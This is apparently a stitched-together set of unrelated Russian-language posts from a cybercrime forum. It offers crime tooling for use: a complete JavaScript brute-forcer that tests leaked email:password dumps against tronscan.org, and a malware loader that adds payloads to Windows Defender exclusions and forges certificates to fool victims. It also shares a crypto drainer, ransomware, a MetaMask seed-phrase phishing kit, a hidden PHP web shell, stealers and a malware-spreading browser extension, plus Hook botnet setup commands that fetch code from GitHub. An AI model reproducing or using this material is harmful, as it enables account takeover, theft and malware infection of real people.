TextPipe Pro — мощный инструмент для преобразования, очистки и извлечения текста для мэйнфреймов, архивирования данных в IoT, SSIS, PDF, Word / Excel, HTML-XML, JSON и данных с разделителями: замены в них текста, выполнения сложных преобразований, конвертирования и т.п.
В TextPipe Pro встроено почти полторы сотни фильтров практически на все случаи жизни — для разбивки и объединения файлов, добавления номеров строк, преобразований между OEM и ANSI, удаления столбцов, двоичных символов, кодов ANSI, дублирующихся строк кодов HTML, конвертации почтовых приложений из одного формата в другой и т.д.
Поддерживается сложный поиск/замена, возможна связь с любой ADO/ODBC-базой и выполнение SQL-запросов с сохранением полученных результатов в файлах различного формата, работа из командной строки и очень многое другое.
Click to expand...
Я часто вижу, как люди не могут обработать данные - логи, тексты, при этом ищут какой-то специфический софт, скрипт - достаточно часто для этого достаточно просто Textpipe pro. При этом, например, использовать sed в консоли linux достаточно геморно, я вам скажу. Самое неудобное там - это отсутствие вменяемой отладки (да и сам bash супер-тормоз, но консольные утилиты - быстрые). А в Textpipe она есть и очень удобная.
**Magnet-cсылка для скачивания с рутрекера (с кряком):
magnet:?xt=urn:btih:78D004C809B7FED410941B91A9AD41461F9ADE48&tr=http%3A%2F%2Fbt2.t-ru.org%2Fann%3Fmagnet&dn=TextPipe%20Pro%20v9.7.3%20Retail%20%5B2014%2CMl%5CRus%5D
Плюсы программы:**
+ бесконечное количество папок и файлов для обработки, бесконечное количество
фильтров. Фильтры выстраиваются последовательно для обработки.
+ регулярные выражения в полном объеме и даже больше
Минусы:
- работает только под windows
- не загружает в память файл(ы) целиком, процесся их по очереди
- слабая многопроцессорность - она есть, но очень условная, все задачи
проходятся линейно.
(возможно, будет дополняться)
Я планирую этот топик в помощь новичкам, и в качестве примера буду сюда скидывать проекты для Textpipe pro, попутно объясняя, что там делается.
Нужен софт для удаленного контроля за устройством android.
Приоритет функций:
скриншоты;
кейлоггер;
возможность записи аудио (окружение телефона) по расписанию;
удаленный файловый менеджер (просмотр содержимого);
удаленное получение файлов из памяти телефона;
возможность удаленно перезагрузить телефон (по возможности);
установка из .apk файла;
возможность прослушивания аудио (окружение телефона) в режиме реального
времени;
возможность получение указанной выше информации по категориям в настраиваемое
место;
скрытая и стабильная работа на новых версиях android.
Нет необходимости в доступе к счетам, подмене или внесении изменений в
счета(платежные системы), основная цель - контроль.
Оплата только через гарант.
По предложениям обращаться в л/с.
Нужен Unlock Tool для разблокировки андроид телефонов, кому не жалко и не сложно оставьте ссылку или же напишите мне в личку. Желательно версию поновее. Чтобы мог подзаработать на хлеб
MS Drainer – поддерживает семь самых популярных сети: Ethereum, BNB Smart Chain, Polygon, Avalanche, Arbitrum, Fantom и Optimism. Поиск активов на кошельках пользователей осуществляется при помощи надежного провайдера DeBank, а при желании его можно заменить на Ankr, Zapper или OpenSea с помощью настроек. Дрейнер успешно справляется с нахождением основной монеты кошелька, ERC-20 токенов и NFT, которые он с таким же успехом выводит в полностью автоматическом режиме.
Описание основного функционала скрипта
Продавал этот пидр AspirineDev за 4500$ реальный автор Pakulichev
Ловите бесплатно
You must spend at least 2 day(s) on the forum to view the content.
](https://anonfiles.com/h5v4p0xez4/894nd4njc04_zip)
anonfiles.com
пароль: xss.is___dobrij_doc
Спустя почти полтора года с момента прошлого выпуска представлен релиз сканера сетевой безопасности Nmap 7.80, предназначенного для проведения аудита сети и выявления активных сетевых сервисов. В состав включено 11 новых NSE-скриптов для обеспечения автоматизации различных действий с Nmap. Обновлены базы сигнатур для определения сетевых приложений и операционных систем.
Последнее время основная работа была сосредоточена на усовершенствовании и стабилизации библиотеки Npcap, развиваемой для платформы Windows в качестве замены WinPcap и использующей современный Windows API для организации захвата пакетов. Много мелких улучшений внесено в движок Nmap Scripting Engine (NSE) и связанные с ним библиотеки. В Nsock и Ncat добавлена поддержка сокетов с адресацией AF_VSOCK, работающих поверх virtio и используемых для взаимодействия между виртуальными машинами и гипервизором. Реализовано определение сервиса adb (Android Debug Bridge), включенного по умолчанию на многих мобильных устройствах.
Новые NSE-скрипты:
broadcast-hid-discoveryd - определяет присутствие в локальной сети HID- устройств (Human interface device) через отправку широковещательных запросов;
broadcast-jenkins-discover - определяет серверы Jenkins в локальной сети через отправку широковещательных запросов;
http-hp-ilo-info - извлекает информацию из серверов HP c поддержкой технологии удалённого управления iLO;
http-sap-netweaver-leak - определяет наличие SAP Netweaver Portal с включенным модулем Knowledge Management Unit, допускающим анонимный доступ;
https-redirect - выявляет HTTP-серверы, перенаправляющие запросы на HTTPS без смены номера порта;
lu-enum - перебирает логические блоки (LU, Logical Units) серверов TN3270E;
rdp-ntlm-info - извлекает информацию о домене Windows из сервисов RDP;
smb-vuln-webexec - проверяет установку сервиса WebExService (Cisco WebEx Meetings) и наличие в нём уязвимости, допускающей выполнение кода;
smb-webexec-exploit - эксплуатирует уязвимость в WebExService для запуска кода с привилегиями SYSTEM;
ubiquiti-discovery - извлекает информацию из сервиса Ubiquiti Discovery и помогает определить номер версии;
vulners - отправляет запросы к БД Vulners, для проверки наличия уязвимостей на основе определённого при запуске Nmap сервиса и версии приложения.
**Автор student /
мой_телеграмм_канал
Источник: **https://xss.is
BruteForce tronscan.org написанный на JavaScript.
Это мой авторский проект написанный полностью на JavaScript на движке
A-Parser. Многие участвуют в конкурсе и выкладывают просто проект и пояснение,
а я вам хочу рассказать как создавался этот проект. Пользоваться им довольно
легко. Запускаем A-Parser, импортируем пресет, загружаем файл в котором
хранятся email:password, запускаем. Инструкция ниже
Code:Copy to clipboard
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
Ggf+rwoz8Vru3urf2fPlRg==
Всё. Этого достаточно чтобы начать с ним работать.
Для чего нужен этот проект
Если вы хоть раз работали в дампами базы данных в формате email:pass, то
сталкивались с тем, что они не имеют никакого отношения к криптовалюте или
любой другой тематике, которая вам нужна. Можно конечно взять все это дело
выкинуть, а можно миллионные строки проверить на регистрацию на популярных
крипто проектах. Я выбрал проект tronscan.org потому что он очень популярен и
каждый из вас о нем слышал. Написать проект на него совсем несложно, потому
что нет капчи, какой либо другой защиты и все предельно понятно.
Предыстория
Тут и начинается самое интересное. Когда я работал с большим объемом
дампов(это было очень давно), в то время я еще учился в школе, готовился к
поступлению в вуз. У меня были проекты с капчой, всякие биржи, заметки и тому
подобное. Я не мог к примеру 10 миллионов email:pass поставить брутиться, тут
дело не только в ресурсах, дак еще таким образом можно уничтожить таргет.
Администратор заподозрит неладное и включит дополнительную проверку, поставит
капчу, ограничит попытки входа в учетную запись. Да, бывало такое, что если в
одну учетную запись заходить более 5 раз с неверным паролем, то прилетал бан.
Я стал думать как заточить дампы. Мой на тот момент товарищ Barracuda555 с
другого форума (если читаешь статью привет). Предложил использовать
булку(openbullet - это проект с открытым исходным кодом, на нем удобно
создавать брутфорсеры) и tronscan.org. Я запустил этот проект и понял, что
скорость неплохая, дак еще гуды сыпятся. И решил это дело переписать на
A-Parser.
Создаем проект
Вот мы и подошли к основной части. Создание проекта. Раньше люди, которые
писали брутфорсеры, регчекеры, ретриверы были очень востребованы на
тематических форумах. Не знаю как сейчас. Салют
MonacoDeveloper. До сих пор задаюсь вопросом куда пропал
Jeka Vain. Интересно, есть кто помнят?
И так ближе к делу. У нас есть проект tronscan.org. Я знал что у него есть API
и документация. https://docs.tronscan.org/getting-started/api-keys я
ознакомился с ней, но не нашел ничего связанного с авторизацией. Зато нашел
rate limits. И понял, что если фаззить эндпоинты, то это будет очень долго,
либо надо использовать прокси. Потом я отбросил эту идею и понял, что я жестко
туплю. Ведь я даже не попробовал авторизоваться и посмотреть проходящие
запросы. Ну что же. Время создавать учетку и перехватывать запросы.
Тут мы видим всплывающее окно, которое говорит нам, что нужно подтвердить
учетную запись. Значит мы можем сделать вывод, что существую следующие виды
аккаунтов:
1. Несуществующий аккаунт
User does not exist, please register first
2. Неподтвержденный аккаунт
3. Неверный пароль
4. Неверный формат email
Теперь запускаем Burp Suite, чтобы посмотреть как работает все это дело
изнутри. Включаем перехватчик и жмем кнопку Log in
Вот видим эндпоинт. Жмем FORWARD.
Вот так передаются данные
Ctrl+a и Ctrl+r (отправляем в repeater)
Теперь попробуем ввести другой email замето
jekavain2@gmail.com и отправить. С целью
посмотреть что изменится.
retMsg отображает ошибку
Нам нужно просто сохранить содержимое ключа "retMsg". Для всех типов
user not exist
email registered but not activated
SUCCESS
illegal email
incorrect password
При написании скрипта будем использовать строгий режим. Что это такое? Так-то
говорящее название, но по сути это режим, когда видны все недочеты
разработчика и они выводятся на экран, например нельзя использовать
зарезервированные слова, нельзя использовать переменную, если не определить
тип, избавляемся таким образом от тихих ошибок и повышаем безопасность. Чтоб
его использовать достаточно в начале скрипта написать 'use strict';
Приступаем писать первый блок
JavaScript:Copy to clipboard
'use strict';
var aParserTypes = require('a-parser-types');
class JS_Order_3913 extends aParserTypes.BaseParser {
async parse(set, results) {
try {
const [email, password] = set.query.split(this.conf.separator);
if (!email || !password) {
throw new Error(`No email or password, probably wrong with separator ${this.conf.separator}`);
}
const body = {
email,
password
};
let { success, data } = await this.request('POST', 'https://apilist.tronscan.org/external/user/login', {}, {
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(body)
});
Что тут происходит если кратко говорить. Создается функция parse, которая содержит set, results. query - это наш запрос email:pass, он разделяется по : в две переменные email и password. Если не получается разделить и получить email или пароль, то ошибка. body содержит в json формате email и пароль. Далее отправляется запрос на api c заголовком Content-Type: application/json и с телом body(содержит email и пароль). Думаю тут все понятно.
JavaScript:Copy to clipboard
data = data.toString();
if (!success) {
throw new Error(`No data can be retrieved from the ${set.query}`);
}
const json = JSON.parse(data);
let status = json.retMsg[0];
data содержит в себе ответ от сервера в формате json. Далее мы преобразовываем
data в строку. И парсим сообщение и сохраняем как json. Создаем переменную
status, которая хранит сообщение ответ от сервера.
Далее идет блок с условиями. Используется метод case.
JavaScript:Copy to clipboard
switch (status) {
case 'email registered but not activated':
status = 'User is not activated, please activate or re-register';
break;
case 'incorrect password':
status = 'Incorrect password';
break;
case 'SUCCESS':
status = 'GOOD';
break;
case 'illegal email':
status = 'Invalid email format';
break;
case 'user not exist':
status = 'User does not exist, please register first';
break;
default:
this.logger.put(`Unprocessed status: ${status}`);
}
results.status = status;
results.success = success;
return results;
}
catch (e) {
this.logger.put(e.message);
results.success = 0;
return results;
}
}
}
Вывод результата. email:pass | status(сообщение из retMsg, только мы его переделали для удобства вместо SUCCESS например GOOD)
JavaScript:Copy to clipboard
JS_Order_3913.defaultConf = {
version: '0.0.2',
results: {
flat: [
['status', 'Account status'],
]
},
max_size: 2 * 1024 * 1024,
parsecodes: {
200: 1,
},
results_format: "$query | $status\\n",
separator: ':'
};
JS_Order_3913.editableConf = [
['separator', ['textfield', 'Login-password separator']]
];
exports.JS_Order_3913 = JS_Order_3913;
Проверяем все ли работает. Также не забываем удалить status, который содержит
regex User does not exist, please register first|Invalid email format
по дефолту в A-Parser нет фильтра по статусу. Мы его сами создали вот тут:
JavaScript:Copy to clipboard
flat: [
['status', 'Account status'],
]
Надеюсь мой проект вам принесет пользу!
Исходник:
JavaScript:Copy to clipboard
'use strict';
var aParserTypes = require('a-parser-types');
class JS_Order_3913 extends aParserTypes.BaseParser {
async parse(set, results) {
try {
const [email, password] = set.query.split(this.conf.separator);
if (!email || !password) {
throw new Error(`No email or password, probably wrong with separator ${this.conf.separator}`);
}
const body = {
email,
password
};
let { success, data } = await this.request('POST', 'https://apilist.tronscan.org/external/user/login', {}, {
headers: {
'Content-Type': 'application/json'
},
body: JSON.stringify(body)
});
data = data.toString();
if (!success) {
throw new Error(`No data can be retrieved from the ${set.query}`);
}
const json = JSON.parse(data);
let status = json.retMsg[0];
switch (status) {
case 'email registered but not activated':
status = 'User is not activated, please activate or re-register';
break;
case 'incorrect password':
status = 'Incorrect password';
break;
case 'SUCCESS':
status = 'GOOD';
break;
case 'illegal email':
status = 'Invalid email format';
break;
case 'user not exist':
status = 'User does not exist, please register first';
break;
default:
this.logger.put(`Unprocessed status: ${status}`);
}
results.status = status;
results.success = success;
return results;
}
catch (e) {
this.logger.put(e.message);
results.success = 0;
return results;
}
}
}
JS_Order_3913.defaultConf = {
version: '0.0.2',
results: {
flat: [
['status', 'Account status'],
]
},
max_size: 2 * 1024 * 1024,
parsecodes: {
200: 1,
},
results_format: "$query | $status\\n",
separator: ':'
};
JS_Order_3913.editableConf = [
['separator', ['textfield', 'Login-password separator']]
];
exports.JS_Order_3913 = JS_Order_3913;
Spoiler: ღ
Проект вышел при финансовой поддержки этих людей: ice80 MAYC
Это расширение для google chrome браузера написанное на Javascript - фронтенд
на чистом js, серверная часть на фреймворке expressjs.
В чём суть? Расширение находит на странице ссылки на скачивание файлов и
меняет их на ссылки скачивания с вашего сервера, само расширение делится на
frontend/backend части.
Бекенд часть - тут есть папка для файлов и файл settings.json с массивом
file_extensions в него можно записывать расширения файлов ссылки на которые вы
хотите заменять, а в папку files положить сами файлы. Файлы могут иметь любое
название, главное чтобы их расшрирение совпадало с тем что указано в json.
Итоговый файл, который будет скачивать человек всегда будет с таким же
названием как и тот что был на сайте изначально.
Фронтенд часть – это само расширение, там хранится всего два файла manifest.json и main.js. Информация в манифесте касается расширения. В нем можно измененить название, описание и сайты, на которых будет работать расширение (по умолчанию - все). Используется манифест третьей версии. main.js – основной скрипт который будет запускать на сайтах и изменять ссылки ведущие на скачивание файлов.
Как настроить и подготовить?
Для подготовки самого браузерного расширения в папке extension нужно найти
файл main.js и на 5 строке нужно прописать ip/домен своего сервера, после
этого папка extension будет готова к загрузке в виде расширения для браузера
google chrome.
Папку backend нужно залить на сервер, прописать в settings.json расширения файлов которые вы хотите подменять, закинуть ваши файлы в папку files, установить docker и запустить скрипт deploy.sh предварительно сделав его исполняемым.
Code:Copy to clipboard
chmod +x deploy.sh
Сама идея расширения показалось мне интересной, если найти способ получить инсталлы этого расширения то оно может оказаться очень полезным и профитным, с помощью него можно легко распространять малварь. Если данная работа окажется для кого нибудь полезной, буду очень рад.
АП. Все еще жду всех.
P.S. Держите первую ветку локера того самого HelloKitty.
![securityaffairs.com](/proxy.php?image=https%3A%2F%2Fi0.wp.com%2Fsecurityaffairs.com%2Fwp- content%2Fuploads%2F2019%2F06%2Fransomware.jpg%3Ffit%3D970%252C546%26ssl%3D1&hash=5f788ffb74938d59ce698c38679bfc26&return_error=1)
gang operates out of Ukraine ](https://securityaffairs.com/125675/cyber- crime/hellokitty-ransomware-ukraine.html)
While investigating a data breach, FBI accidentally revealed that it believes that the HelloKitty ransomware gang operates out of Ukraine.
![securityaffairs.com](/proxy.php?image=https%3A%2F%2Fsecurityaffairs.com%2Fwp- content%2Fthemes%2Fsecurity_affairs%2Fimages%2Ffavicon.ico&hash=e887e732871b3fc7e077dd4eb1066006&return_error=1) securityaffairs.com
Парни скидываю свежий фиш metamask ,собирает сид фразы
Важно - нужно заредактить код ,чтобы он стучал вам
Может кому пригодиться
You must have at least 10 message(s) to view the content.
Привет.
Mnemonic searcher - софт по поиску мнемоник фраз формата бип39
В данный момент работает только с английским языком и не удаляет дубли из
конечного файла.
Умеет работать с docx, xlsx, а так же любыми файлами которые содержат данные в
открытом виде.
Работает с zip архивами любой глубины, имеется настройка игнорируемых файлов,
которая распространяется и на файлы в архиве
Парсит мнемоники 12, 15, 18, 21 и 24 длинны, а так же умеет обрабатывать множество форматов записи и разные разделители (столбик, с цифрами и т.д), регулируется число дублей в мненонике. Валидирует чек сумму при включенной настройке. Так же есть возможность парсить приват кеи, но из-за большого числа мусорных записей ( много разных данных типо кук имеет 64 хексоцифорный формат ) я сделал это опциональной настройкой.
Работает относительно быстро, билды в закрепе под винду и линукс
Веб шелл написан на PHP+js. Терминал
На момент публикации веб шелл FUD.
Функционал
- Определение IP (ifconfig.me)
- Определение докера.
- Терминал
- Файловый менеджер
-- Создание файлов и директорий.
-- Переименование файлов и директорий.
-- Удаление файлов и директорий.
-- Редактирование файлов без изменении времени последнего изменения файла.
Пароль по умолчанию xss
Code:Copy to clipboard
$password = md5('xss');
Spoiler: Скрины
Собрал большую стопку стиллеров написанных на .Net + Лучшие обфускаторы.
В архиве имеется много всего полезного для создания полноценного стиллера на
C#
https://mega.nz/#!6K5hQZ4b!jfk3cShFmcGGy2r0iJePDjfxwW5h8KEyuNbKWaDcIYw
https://yadi.sk/d/BRMFDmhmmV3e8w
Пароль к архиву: r3xq1( вводить руками )
Хайда не будет, всё в открытый доступ!
Данный софт предназначен для подгрузки и запуска ваших ехе с добавлением папки в которой ваши ехе находятся в исключения Windows Defender и проверкой на виртуальные машины а так же добавление сертификата на данный инсталлер
Click to expand...
Spoiler: Для чего же конкретно нужен данный софт?
Давайте представим ситуацию: допустим, вы хотите пролить трафик на YouTube, но мамонты становятся умнее, и уже не ведутся на ворованные ролики с чужими софтами. Вот тут-то и вступает в дело мой инсталлер с интерфейсом обычной программы, с которым можно снять свой собственный ролик и, тем самым, повысить доверие у потенциальных мамонтов.
Также есть небольшая защита от Windows Defender в виде добавления ваших файлов в исключения Windows Defender. Также присутствует защита от виртуальных машин, помогающая избавиться от надоедливых уведомлений от логов с серверов антивирусов.
Лично на своем опыте убедился в том, что если работаешь точечно и лично ведешь диалог с жертвой, то имя программы с интерфейсом, а тем более еще и с подкачкой реально работающих файлов, доверие многократно увеличивается. Так что, если вы льете трафик, подобный инсталлер будет однозначным плюсом и никогда не будет лишним.
Spoiler: Как работает данный инсталлер?
Первым шагом жертва должна запустить инсталлер. Сразу после запуска происходит проверка на то, запущен ли инсталлер на обычном компьютере или виртуальной машине. Затем, после нажатия на кнопку "Install", в первую очередь происходит подгрузка ваших скрытых исполняемых файлов (exe) и добавление их в исключения Windows Defender. Только после этого начинается подгрузка видимых для пользователя файлов с работающим индикатором прогресса загрузки.
Также, поскольку на инсталлер наложен поддельный сертификат, это помогает обойти защиту некоторых антивирусов, так как некоторые из них проверяют сам факт наличия сертификата, а не его действительность.
Spoiler: Настройка и компиляция инсталлера
1. Запустите XSSInstaller.sln
2. Затем откройте файл Config.cs
3. Замените ссылки на exe которые будут подкачиваться и запускаться (например
прямые ссылки из Discord)
4. Замените ссылки на zip которые будут подкачиваться и будут видны
пользователю (например прямые ссылки из Discord)
5. В Visual Studio скомпилируйте проект в Release
Spoiler: Добавление сертификата
1. Откройте папку Certificate transfer
2. Закиньте туда получившийся XSSInstaller.exe
3. Откройте cmd в папке Certificate transfer
4. Введите команду "python Certificate_transfer.py -i iexplore.exe -t
XSSInstaller.exe -o Certificated_XSSInstaller.exe"
Результат:
Spoiler: Ссылка на скачивание исходников проекта
Пароль: XSS
Ссылка:
https://mega.nz/file/hS1WCKRY#gl4SThHbdSrqKp4NjxfpQHFRsO5w1TwAJSOlaLiEV-Y
БЕСПЛАТНЫЙ ЧЕКЕР ДОСТУПОВ НА ВАЛИД
https://qaz.im/load/A9s7tz/577fd1b2-585c-4012-a22a-2f584a75e7e0
![dropmefiles.com](/proxy.php?image=https%3A%2F%2Fdropmefiles.com%2Fimages%2Fshare- logo_vk.png&hash=3f67b87028329be58fe8d4c73ccac7b9&return_error=1)
](https://dropmefiles.com/Odiqj)
Share your pictures, send large videos, exchange music or transfer big files. No registration required. Unlimited upload/download speed.
dropmefiles.com
https://www.sendspace.com/file/wnwz1u без паролей на архив и тд
наломаю немного идиотам которые то что пишется за день и пару соток цена продают по 1к подписки, ) скоро скину еще 1 новый с полным функционалом полностью под все что можно)
1333333@#$@!!!swfewf пас от архива
для тех кто что то боится юзайте левые серваки для чека нет проблем, делали под меня кодер с иходами пропал так бы и их выложил, скоро допилят новый полностью со всеми линками которыми только есть и его скину) , (это чисто наломать вафлистам которые продают на месяц за 1к софт)
To Install Hook Botnet You Need a Vps Server, We Recommend a Good Vps 4GB RAM and 8GB RAM or Higher
"ubuntu 20.04 - ports: 8089,80,5000,50000,3434,12342,8000,3389,3306"
sudo su
cd /var/
apt install unzip && apt install wget
wget
https://github.com/rastgeleartikyeter/files/releases/download/asdasdasd/Hook.zip
unzip Hook.zip && rm -rv Builder/ && rm -rv Hook.zip && mv Hook\ panel\ +
inj/ www
cd www/
sudo apt update -y && sudo apt upgrade -y && sudo apt-get install build-
essential -y
nano .env // edit this manually
BACKEND_INTERFACE=0.0.0.0
BACKEND_PORT=8089
BACKEND_URL=http://206.189.234.38:8089/
BACKEND_DEBUG=true
SOCKET_IO_URL=http://206.189.234.38:3434
FRONTEND_URL=http://206.189.234.38
FRONTEND_INTERFACE=0.0.0.0
FRONTEND_PORT=80
MYSQL_PORT=3306
MYSQL_DATABASE=hook
MYSQL_USER=no-root
MYSQL_ROOT_PASSWORD=S29udG9sU29iZWtoNjI3
MYSQL_PASSWORD=NzZoZVhCYXlU
MYSQL_HOST=mysql
PHP_SOCKETS_PORT=8000
PHP_TCP_PORT=12342
GOLANG_PORT=3434
GOLANG_KEY=1A1zP1eP5QGefi2DMPTfTL5SLmv7Divf
GOLANG_INITIAL_VECTOR=0123456789abcdef
TIMEZONE=Europe/Moscow
TELEGRAM_TOKEN=Your Token Telegram Bot
rm -rv golang/.env && rm -rv frontend/.env && rm -rv frontend/.env.production
make ports && chmod 777 *
make install && make env
make build
reboot
sudo su
cd /var/www
make build
make build
reboot
http://"your Ip"
token: root
password: changemeplease
yaBot (яБот) - это инструмент командной строки, написанный на Go, предназначенный для решения v2 Invisible reCaptcha только с помощью запросов.
GitHub: https://github.com/grozdniyandy/yaBot/
Эта программа написана на языке программирования Go. Он использует стандартную библиотеку для различных операций и полагается на "goquery" парсинга для HTML- документов.
Это приложение используется для обхода recaptcha V2 invisible. Этот инструмент будет работать не для каждого веб-сайта, этот обход работает со старой v2.Что это значит? Это означает, что вы должны проверить, работает ли это в вашем сервисе или нет.
Все, что вам нужно сделать, это установить и запустить приложение. Он запустит службу на порту 9090, и вы можете отправить закодированный URL-адрес "anchor", чтобы в результате получить решение (solution).
Я скачал и запустил его из релизов:
Code:Copy to clipboard
./yabot
После того как вы запустили инструмент, вы можете просто открыть URL-адрес в своем браузере или использовать cURL
Code:Copy to clipboard
http://127.0.0.1:9090/cap?url=https%3A%2F%2Fwww.google.com%2Frecaptcha%2Fapi2%2Fanchor%3Far%3D1%26k%3D%7BKLYUCH%7D%26co%3D%7BCO%7D.%26hl%3Den%26v%3D%7BV%7D%26size%3Dinvisible%26sa%3Dlogin%26cb%3D%7BCB%7D
Code:Copy to clipboard
curl 'http://127.0.0.1:9090/cap?url=https%3A%2F%2Fwww.google.com%2Frecaptcha%2Fapi2%2Fanchor%3Far%3D1%26k%3D%7BKLYUCH%7D%26co%3D%7BCO%7D.%26hl%3Den%26v%3D%7BV%7D%26size%3Dinvisible%26sa%3Dlogin%26cb%3D%7BCB%7D'
Я хочу напомнить вам, что данное программное обеспечение предназначено только для легального использования.
Но чтобы ответить на ваш вопрос, есть статья о том, как я ее использовал:
https://xss.is/threads/101747/
В статье инструмент обошел / решил капчу, реализованную в astroproxy.com - В
случае, если вам придется где-то запускать тесты и вы увидите капчу, этот
инструмент стоит проверить, так как иногда количество запросов может быть
слишком большой, и это обойдется вам в $
Этот инструмент больше предназначен для экономии денег, чем для их зарабатывания. Если этот метод обхода / решения проблемы сработает в вашем сервисе, вы сэкономите приличную сумму денег. Также некоторые люди могут продавать это как обход "CAPTCHA".
Тык - это инструмент, написанный на Go с целью проверки уязвимостей для перехвата кликов (clickjacking). Он работает путем проверки заголовков безопасности, таких как "Content-Security-Policy" и "X-Frame-Options". Если ни один из них не найден, то инструмент выдаст успешный результат. Он проверяет эти заголовки безопасности как для протоколов HTTP, так и для HTTPS.
GitHub: https://github.com/grozdniyandy/tik
Советую использовать вместе с "Вход" : https://github.com/grozdniyandy/vxod
Эта программа написана на языке программирования Go. Он использует стандартную библиотеку для различных операций и полагается на "goroutines" для параллельного выполнения.
